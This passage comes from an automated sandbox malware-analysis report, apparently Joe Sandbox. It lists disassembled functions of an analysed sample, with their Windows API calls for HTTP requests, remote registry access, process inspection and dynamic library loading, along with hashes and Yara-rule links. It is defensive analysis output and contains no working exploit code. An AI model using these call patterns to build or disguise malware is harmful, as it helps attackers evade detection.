                                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00ACC684
                                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00ACC697
                                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00ACC6C7
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 458670788-1403004172
                                                                                                                                                        • Opcode ID: 68f03525d5c7d6b91baedc031a58698a00cd39d5f11bf5bc7c869f285c41bc98
                                                                                                                                                        • Instruction ID: e32ac47711f5e2a4d8dd932ab2a8af1d0c5c68141d5583733a1ed7f737b44d1e
                                                                                                                                                        • Opcode Fuzzy Hash: 68f03525d5c7d6b91baedc031a58698a00cd39d5f11bf5bc7c869f285c41bc98
                                                                                                                                                        • Instruction Fuzzy Hash: DB21F171A00108BEDB04EB64C986EFFBBB9DF06360B11961DF42AE71E1DB745D0A9720
                                                                                                                                                        Function 00AE4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AE4A60
                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE4A86
                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00AE4AB6
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00AE4AFD
                                                                                                                                                          • Part of subcall function 00AE56A9: GetLastError.KERNEL32(?,?,00AE4A2B,00000000,00000000,00000001), ref: 00AE56BE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1951874230-3916222277
                                                                                                                                                        • Opcode ID: 06fe1797266badeb48c0bdaacd7ce875d81a2ad382972aa98a895e9463ced450
                                                                                                                                                        • Instruction ID: 882c28041cd61df97041c4b88e8b60fdd9112091e24eb083bb37d8ddb57ed62f
                                                                                                                                                        • Opcode Fuzzy Hash: 06fe1797266badeb48c0bdaacd7ce875d81a2ad382972aa98a895e9463ced450
                                                                                                                                                        • Instruction Fuzzy Hash: 5F21CFB5540208BFEB11DF669C84EBBB6FCEB8C798F10402AF50597140EA649D059771
                                                                                                                                                        Function 00A938E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B0454E
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • _memset.LIBCMT ref: 00A93965
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00A939B5
                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A939C6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                        • String ID: Line:
                                                                                                                                                        • API String ID: 3942752672-1585850449
                                                                                                                                                        • Opcode ID: 0e8b7e01307bc7853f0e0f77b8cf23e099ba49874d83c0c9acd80c9978112ccb
                                                                                                                                                        • Instruction ID: a82aaffc717de2f35d347eeb213f27116e4699a6e6c5106ca2984f934d41422e
                                                                                                                                                        • Opcode Fuzzy Hash: 0e8b7e01307bc7853f0e0f77b8cf23e099ba49874d83c0c9acd80c9978112ccb
                                                                                                                                                        • Instruction Fuzzy Hash: AC31C172608340ABDF21EB64DC51BDEB7F8AF54311F04495AF685931A1DF709A48CB92
                                                                                                                                                        Function 00AF8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                                                                                                                                                          • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                                                                                                                                                          • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                                                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AF8F69
                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00AF8F70
                                                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AF8F85
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00AF8F8D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                                        • API String ID: 4146253029-1011021900
                                                                                                                                                        • Opcode ID: 429dc97ca0efbdb5dbab28e99d548755e19f321c6fc39bf896f38d584e9200e3
                                                                                                                                                        • Instruction ID: 77bc8e72b1eda64cf36e6f5532e7d76e3a10b583b0eddb887f8976c154779278
                                                                                                                                                        • Opcode Fuzzy Hash: 429dc97ca0efbdb5dbab28e99d548755e19f321c6fc39bf896f38d584e9200e3
                                                                                                                                                        • Instruction Fuzzy Hash: EA21AC71200209AFEF104FA4EC80EBB77AEEF49364F104628FB1597191CB79DC509760
                                                                                                                                                        Function 00ADE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00ADE392
                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00ADE3E6
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ADE3FF
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B2DBF0), ref: 00ADE43D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                        • String ID: %lu
                                                                                                                                                        • API String ID: 3164766367-685833217
                                                                                                                                                        • Opcode ID: 6110757e9f0c7a2bef16e6954b2dc749e4dbceb1f3ab2d7c209049709dba5daf
                                                                                                                                                        • Instruction ID: 10662ec598aa333e649a9c6fd778e4db25fc0e6c50f21570191aaf1e020628cc
                                                                                                                                                        • Opcode Fuzzy Hash: 6110757e9f0c7a2bef16e6954b2dc749e4dbceb1f3ab2d7c209049709dba5daf
                                                                                                                                                        • Instruction Fuzzy Hash: BA214F75A40108AFCB10EB64C985EEEB7F8EF99714B1080A9F509EB251D631DA05CB50
                                                                                                                                                        Function 00ACD7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                          • Part of subcall function 00ACD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ACD640
                                                                                                                                                          • Part of subcall function 00ACD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACD653
                                                                                                                                                          • Part of subcall function 00ACD623: GetCurrentThreadId.KERNEL32 ref: 00ACD65A
                                                                                                                                                          • Part of subcall function 00ACD623: AttachThreadInput.USER32(00000000), ref: 00ACD661
                                                                                                                                                        • GetFocus.USER32 ref: 00ACD7FB
                                                                                                                                                          • Part of subcall function 00ACD66C: GetParent.USER32(?), ref: 00ACD67A
                                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00ACD844
                                                                                                                                                        • EnumChildWindows.USER32(?,00ACD8BA), ref: 00ACD86C
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ACD886
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                        • String ID: %s%d
                                                                                                                                                        • API String ID: 1941087503-1110647743
                                                                                                                                                        • Opcode ID: 03544114f8fd05b334b7398a883a886671f16a0d3ceb42f7af2c4ef5d2bcdfd2
                                                                                                                                                        • Instruction ID: d798cc8805b90a16383d3329afd0522796139e8b7c6071aa3bd316cdfa6d7b3a
                                                                                                                                                        • Opcode Fuzzy Hash: 03544114f8fd05b334b7398a883a886671f16a0d3ceb42f7af2c4ef5d2bcdfd2
                                                                                                                                                        • Instruction Fuzzy Hash: A111AF756102056BDF11BF608D86FEA37A9AB44704F0180B9BA0DAB186CBB45945DB70
                                                                                                                                                        Function 00AF1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AF18E4
                                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AF1917
                                                                                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00AF1A3A
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF1AB0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2364364464-0
                                                                                                                                                        • Opcode ID: bf2bb856df82080dc71f1fb998e7fc3f00b4ffccee72b03ae7945e61e45e6e6b
                                                                                                                                                        • Instruction ID: d78ebad5883591a2f69f5fd4f9404d53c3cea250ed1693ce7ca24132fb405baa
                                                                                                                                                        • Opcode Fuzzy Hash: bf2bb856df82080dc71f1fb998e7fc3f00b4ffccee72b03ae7945e61e45e6e6b
                                                                                                                                                        • Instruction Fuzzy Hash: 0F817174A40205EBDF10EF64C986BAD7BF5AF49760F148459F905AF3C2D7B8E9408B90
                                                                                                                                                        Function 00AF0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00AF05DF
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00AF066E
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00AF068C
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00AF06D2
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00AF06EC
                                                                                                                                                          • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF282
                                                                                                                                                          • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF2A6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 327935632-0
                                                                                                                                                        • Opcode ID: 9f6ab9ec96eaadc3a69bc20b503804999f869a7dbeb01a46970548d9a0d6f90c
                                                                                                                                                        • Instruction ID: 9bb7148faf560aae4ca760f10a129099906dc71bad27666b16a5a8145ae1aff0
                                                                                                                                                        • Opcode Fuzzy Hash: 9f6ab9ec96eaadc3a69bc20b503804999f869a7dbeb01a46970548d9a0d6f90c
                                                                                                                                                        • Instruction Fuzzy Hash: 49513575A006099FCF00EFA8CA91EADF7F5AF58310B1480A5FA15AB352DB70AD55CB90
                                                                                                                                                        Function 00AF2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                          • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2DE0
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF2E1F
                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AF2E66
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00AF2E92
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AF2E9F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3440857362-0
                                                                                                                                                        • Opcode ID: c04cf2d4933937155b0d22d1afa394279d7518742e61e25affb812b1bd64a5da
                                                                                                                                                        • Instruction ID: 944472f0f2ac4ea5844dbf3a43a8b1e341196501273be794c2228f412924721d
                                                                                                                                                        • Opcode Fuzzy Hash: c04cf2d4933937155b0d22d1afa394279d7518742e61e25affb812b1bd64a5da
                                                                                                                                                        • Instruction Fuzzy Hash: 93515C71204209AFDB05EFA4C991F6BB7E9FF88314F14481EF6958B2A1DB31E905CB52
                                                                                                                                                        Function 00AFCB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
